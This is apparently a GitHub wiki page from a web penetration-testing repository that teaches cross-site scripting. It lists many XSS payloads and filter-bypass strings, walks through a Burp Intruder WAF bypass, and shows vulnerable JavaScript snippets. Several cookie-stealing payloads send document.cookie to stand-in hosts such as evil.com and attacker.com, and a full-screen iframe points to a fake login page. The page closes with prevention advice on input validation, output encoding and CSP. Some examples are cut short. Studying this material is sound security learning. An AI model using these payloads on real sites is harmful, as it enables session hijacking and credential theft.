XSS Attack - ties2/web-pentest GitHub Wiki
Cross-site scripting (XSS) is a type of security vulnerability commonly found in web applications. It allows an attacker to inject malicious code into a web page that is viewed by other users. This can lead to the theft of sensitive information, such as login credentials, session tokens, and other personal data. In this article, we will discuss the different types of XSS attacks and how they can be prevented.
- Reflected
- store
- Blind
- Dom-based
- Self-XSS
Reflected XSS, also known as non-persistent XSS, is the most common type of XSS attack. It occurs when an attacker injects malicious code into a web page that is then reflected back to the user. This usually happens when the user submits a form or enters data into a search box. The injected code is included in the response from the server, and it is executed by the victim's browser.
For example, imagine a website that has a search box where users can search for products. If an attacker enters a malicious script into the search box, such as <script>alert('XSS');</script>, and submits the form, the script will be reflected back to the user and executed in their browser.
other payload to test:
<script>alert(1)</script> <Script>alert(1)</Script><SC<script>ript>alert(1)</SC</script>ript>
img src=x onerror=alert(document.domain)>
"";alert(1)//";
‘;alert(1)//
"type="hidden"><script>alert(1)</script><input"
‘type="hidden"><script>alert(1)</script><input’
"}';alert(1); //
?input=</title><script>alert(1)</script><title>
;</style><script>alert(1)</script> //
Source:
<style>
.body{
color: #fff;
}
</style>
example 1:
payload:
"onmouseover="alert(1)
source:
example 2:
payload:
'-alert(1)-'
source:
var searchTerms = ''-alert(1)-'';
example 3:(bypass waf and list of blicklist by useing intruder of burpsuit)
In Burp Intruder, in the Positions tab, replace the value of the search term with: <> Place the cursor between the angle brackets and click "Add §" twice, to create a payload position. The value of the search term should now look like: <§§> Visit the XSS cheat sheet and click "Copy tags to clipboard". In Burp Intruder, in the Payloads tab, click "Paste" to paste the list of tags into the payloads list. Click "Start attack". When the attack is finished, review the results. Note that all payloads caused an HTTP 400 response, except for the body payload, which caused a 200 response. Go back to the Positions tab in Burp Intruder and replace your search term with: <body%20=1> Place the cursor before the = character and click "Add §" twice, to create a payload position. The value of the search term should now look like: <body%20§§=1> Visit the XSS cheat sheet and click "copy events to clipboard". In Burp Intruder, in the Payloads tab, click "Clear" to remove the previous payloads. Then click "Paste" to paste the list of attributes into the payloads list. Click "Start attack". When the attack is finished, review the results. Note that all payloads caused an HTTP 400 response, except for the onresize payload, which caused a 200 response. Go to the exploit server and paste the following code, replacing YOUR-LAB-ID with your lab ID:
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'> Click "Store" and "Deliver exploit to victim".Stored XSS, also known as persistent XSS, is a type of XSS attack where an attacker injects malicious code into a web page that is then stored on the server and served to other users. This can happen when an attacker is able to upload malicious content to a website, such as a comment or a forum post. The injected code is included in the response from the server, and it is executed by any user who views the page.
For example, imagine a website that allows users to post comments on articles. If an attacker is able to inject a malicious script into a comment, such as <script>alert('XSS');</script>, it will be stored on the server and served to other users who view the article.
DOM-based XSS is a type of XSS attack where the injection of malicious code is reflected in the DOM (Document Object Model) of the page. This can happen when a website uses client-side scripting to manipulate the DOM, such as JavaScript. Unlike the other types of XSS attacks, the payload is not sent to the server. Instead, the attack occurs entirely on the client-side.
For example, imagine a website that allows users to enter their name and displays it on the page using JavaScript. If an attacker is able to inject a malicious script into the name field, such as <script>alert('XSS');</script>, it will be executed by the browser's DOM and cause a pop-up alert to appear.
Note:when you isert and see at site at the same time you should check data if it send to server or not
You shoud check dom in inspect
example 1: img src=c onerror=alert(1)>
or
"; alert(1);//
Source code: (eval has features of execution)
<script>
function updateOutput(){
const output = document.getElementById('output');
const output_box = document.getElementById('output-box');
eval('var field_value= "' + document.getElementById('fullname').value + '"')
if(field_value !== ""){
output.innerHTML = field_value + ' you enrolled'
output_box.classList.add('show');
}
else{
output_box.classList.remove('show');
}
example 2:
payload:
">
source:
<script>
function trackSearch(query) {
document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
}
var query = (new URLSearchParams(window.location.search)).get('search');
if(query) {
trackSearch(query);
}
</script>
example 3:
payload:
source:
<script> function doSearchQuery(query) { document.getElementById('searchMessage').innerHTML = query; } var query = (new URLSearchParams(window.location.search)).get('search'); if(query) { doSearchQuery(query); } </script>example 4: payload:
source:
<script>
$(function() {
$('#backLink').attr("href", (new URLSearchParams(window.location.search)).get('returnPath'));
});
</script>
example 5:
javascript:alert(document.cookie)
example 6:
<iframe src="https://attacker-server/#" onload="this.src+='example 7:
payload:(add storeId parameter to the URL)
product?productId=1&storeId="><img%20src=1%20onerror=alert(1)>
source:
var stores = ["London","Paris","Milan"];
var store = (new URLSearchParams(window.location.search)).get('storeId'); document.write(''); if(store) { document.write(''+store+''); } for(var i=0;i<stores.length;i++) { if(stores[i] === store) { continue; } document.write(''+stores[i]+'');
example 8:(DOM XSS in AngularJS expression)
payload:
{{$on.constructor('alert(1)')()}}
source:
example 9:(reflected DOM XSS) payload:
"-alert(1)}//
source:
document.location = "javascript:alert(1)" window.location = "javascript:alert(1)" location.href = "javascript:alert(1)"
document.location.replace("javascript:alert(1)") window.location.replace("javascript:alert(1)")
Imaginary CookieStealer url:
http://evil.com/cookie.php?txt=
payload 1: <button onclick=window.location='http://evil.com/cookie.php?txt='+document.cookie>Your Whatsapp Chat Backup Download
Payload 2:
<script>window.location='http://evil.com/cookie.php?txt='+document.cookie;</script>Payload 3: <img src=ggg onerror=this.src='http://evil.com/cookie.php?txt='+document.cookie>
Payload 4:
img src=ggg style="display:none;" onerror="this.src='http://evil.com/cookie.php?txt='+document.cookie; this.removeAttribute('onerror');"
<iframe src=http://evil.com/login.html style="position:fixed; top:0; left:0; right:0; width:100%; height:100%;">Use input validation and sanitization to prevent malicious scripts from being injected into web pages. Also, use Content Security Policy (CSP) to restrict the sources of scripts and enforce safe inline scripts.
Input Validation The best way to prevent XSS attacks is to validate all user input. This means checking all data entered into forms, search boxes, and other input fields for malicious content. If any malicious content is found, it should be removed before the data is stored or displayed on the page.
Output Encoding Another way to prevent XSS attacks is to encode all output. This means converting any special characters, such as < and >, into their HTML entities, such as < and >. This prevents the browser from interpreting the characters as code and executing it.
Content Security Policy Content Security Policy (CSP) is a security feature that allows website owners to specify which sources of content are allowed to be loaded on their pages. This can prevent XSS attacks by blocking any external scripts or other content that is not explicitly allowed.
Payload: <script>alert('XSS');</script> Vector: Input fields that reflect user input, such as search boxes and forms.
Payload: <script>alert('XSS');</script> Vector: Input fields that store user-generated content, such as comment sections and forum posts.
Payload: <script>alert('XSS');</script> Vector: Client-side scripts that manipulate the DOM, such as JavaScript.
Payload: <script>new Image().src="http://attacker.com/?cookie="+document.cookie;</script> Vector: Input fields that may contain sensitive information, such as login forms.
Payload: ';alert('XSS');// Vector: Input fields that execute user input as code, such as SQL queries and command prompts.
-
Input Validation Validate user input to remove or reject any malicious content.
-
Output Encoding Encode any user-generated content to prevent it from being interpreted as code.
-
Content Security Policy Implement a CSP to specify which sources of content are allowed to be loaded on the page.
-
Sanitization Libraries Use sanitization libraries to automatically remove or neutralize any malicious code from user input.
Perform unauthorized activities
Use the clickjacking technique
https://github.com/Quitten/XSSor
https://github.com/TheWation/WebSecurityVision
https://github.com/payloadbox/xss-payload-list
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
Conclusion
XSS attacks are a serious security threat that can lead to the theft of sensitive information and other malicious activities. By understanding the different types of XSS attacks and implementing best practices for preventing them, website owners can help protect their users and their data.